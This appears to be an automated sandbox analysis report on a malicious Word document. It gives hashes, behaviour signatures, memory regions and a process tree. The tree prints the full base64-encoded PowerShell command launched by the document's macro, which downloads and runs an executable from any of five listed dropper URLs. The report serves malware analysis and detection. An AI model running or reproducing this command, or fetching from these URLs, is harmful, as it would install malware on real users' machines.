Analysis

  • max time kernel
    101s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 02:56

General

  • Target

    ecb52f58061f00bfe1e13664c51bc314_JaffaCakes118.doc

  • Size

    168KB

  • MD5

    ecb52f58061f00bfe1e13664c51bc314

  • SHA1

    82164dc9d8a1f6782206a98d81c916dd4da4f548

  • SHA256

    757b2c11169922c74fbd273543e035183f05bc07278aac3338357662c972336f

  • SHA512

    c24e9cabc89c83eda2e100f9cb1ea76825223d7103fc52b2e224f0cf9b52e8b28c7bb3985ce9355504b81cd8811e5a0fbb16ee475a7a39003c5af2210e2a11a6

  • SSDEEP

    3072:N4PrXcuQuvpzm4bkiaMQgAlSpu+vVTC5wn5RQ:6DRv1m4bnQgISphvVTqwn5RQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://manandvanwaterlooville.co.uk/wp-admin/prX892/

exe.dropper

https://uniral.com/captchasignup/4J579681/

exe.dropper

https://scyzm.net/lkx7/lqoH8S/

exe.dropper

https://amagna.nl/DZ9MzAobu3/37Z/

exe.dropper

https://nilinkeji.com/online/90fb31/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecb52f58061f00bfe1e13664c51bc314_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2000
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABWAEEARgBHAEsAaQBqAGMAPQAnAEoAQwBNAEQATQBiAHgAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBSAGkAVABZAFAAUgBPAFQAYABvAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQQBXAEUAVgBSAGYAaQBzACAAPQAgACcANAAzADIAJwA7ACQAUQBNAFgAVQBNAHQAcQB4AD0AJwBIAFgAVwBTAFEAcABjAGwAJwA7ACQATABaAEYASQBYAGgAdQB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABBAFcARQBWAFIAZgBpAHMAKwAnAC4AZQB4AGUAJwA7ACQARQBQAFcAWgBWAGMAbAB0AD0AJwBXAEoAQwBZAFIAdQB5AGMAJwA7ACQARABVAEMASwBOAG8AbABsAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAEMATABJAGUATgBUADsAJABZAEoARgBQAEkAcwByAHUAPQAnAGgAdAB0AHAAOgAvAC8AbQBhAG4AYQBuAGQAdgBhAG4AdwBhAHQAZQByAGwAbwBvAHYAaQBsAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGEAZABtAGkAbgAvAHAAcgBYADgAOQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AdQBuAGkAcgBhAGwALgBjAG8AbQAvAGMAYQBwAHQAYwBoAGEAcwBpAGcAbgB1AHAALwA0AEoANQA3ADkANgA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGMAeQB6AG0ALgBuAGUAdAAvAGwAawB4ADcALwBsAHEAbwBIADgAUwAvACoAaAB0AHQAcABzADoALwAvAGEAbQBhAGcAbgBhAC4AbgBsAC8ARABaADkATQB6AEEAbwBiAHUAMwAvADMANwBaAC8AKgBoAHQAdABwAHMAOgAvAC8AbgBpAGwAaQBuAGsAZQBqAGkALgBjAG8AbQAvAG8AbgBsAGkAbgBlAC8AOQAwAGYAYgAzADEALwAnAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgARwBTAE0AVQBsAGEAdQA9ACcATgBKAFcATwBLAHEAbAB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAE8AQgBCAEkAeQB5AG0AIABpAG4AIAAkAFkASgBGAFAASQBzAHIAdQApAHsAdAByAHkAewAkAEQAVQBDAEsATgBvAGwAbAAuACIAZABvAHcAYABOAGwATwBhAEQAYABGAEkAbABFACIAKAAkAEQATwBCAEIASQB5AHkAbQAsACAAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQATgBRAFIAVgBKAHQAaAB0AD0AJwBHAEoARwBCAFUAbgBzAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAFoARgBJAFgAaAB1AHYAKQAuACIATABgAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADIANAAwADUANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAEUAYABBAFQARQAiACgAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQAUwBWAEwAWgBBAHYAeQBrAD0AJwBJAFoATQBNAFYAeQBrAGwAJwA7AGIAcgBlAGEAawA7ACQAQwBXAFoARgBBAHgAdABsAD0AJwBMAE8ASQBXAEcAbABzAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBSAFEAWgBLAGoAcgBsAD0AJwBUAFcASwBEAEoAYwBtAGIAJwA=
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4076

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDF744.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4j1o2wv.0rz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    2KB

    MD5

    256a96fe114c5ed5c83f6680b3f334b7

    SHA1

    d3769fdbedd4639b28461c28226a6d2f3e3eff7d

    SHA256

    056491cedd3440c86712f45d9aeb81baaf1dcbea4cc8f435bb57d61172432283

    SHA512

    74276c7dbfae43ac93958b4dd049635739c8fd5a63580a08c5427369e994fe60cf4510fca320c11efe42bd26f61ec992c906aff9e3470a649e4cb42653c8e5d9

  • memory/2000-53-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-96-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-0-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-6-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-7-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-8-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-12-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-11-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-13-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-15-0x00007FFCCBC70000-0x00007FFCCBC80000-memory.dmp

    Filesize

    64KB

  • memory/2000-14-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-10-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-17-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-19-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-18-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-16-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-9-0x00007FFCCBC70000-0x00007FFCCBC80000-memory.dmp

    Filesize

    64KB

  • memory/2000-77-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-32-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-1-0x00007FFD0E5ED000-0x00007FFD0E5EE000-memory.dmp

    Filesize

    4KB

  • memory/2000-2-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-611-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-26-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-4-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-609-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-89-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-91-0x00007FFD0E5ED000-0x00007FFD0E5EE000-memory.dmp

    Filesize

    4KB

  • memory/2000-92-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-93-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-94-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-95-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-61-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-5-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-102-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-103-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/2000-610-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-3-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-607-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/2000-608-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

    Filesize

    64KB

  • memory/4076-586-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/4076-104-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB

  • memory/4076-83-0x000001D37FEA0000-0x000001D37FEC2000-memory.dmp

    Filesize

    136KB

  • memory/4076-78-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

    Filesize

    2.0MB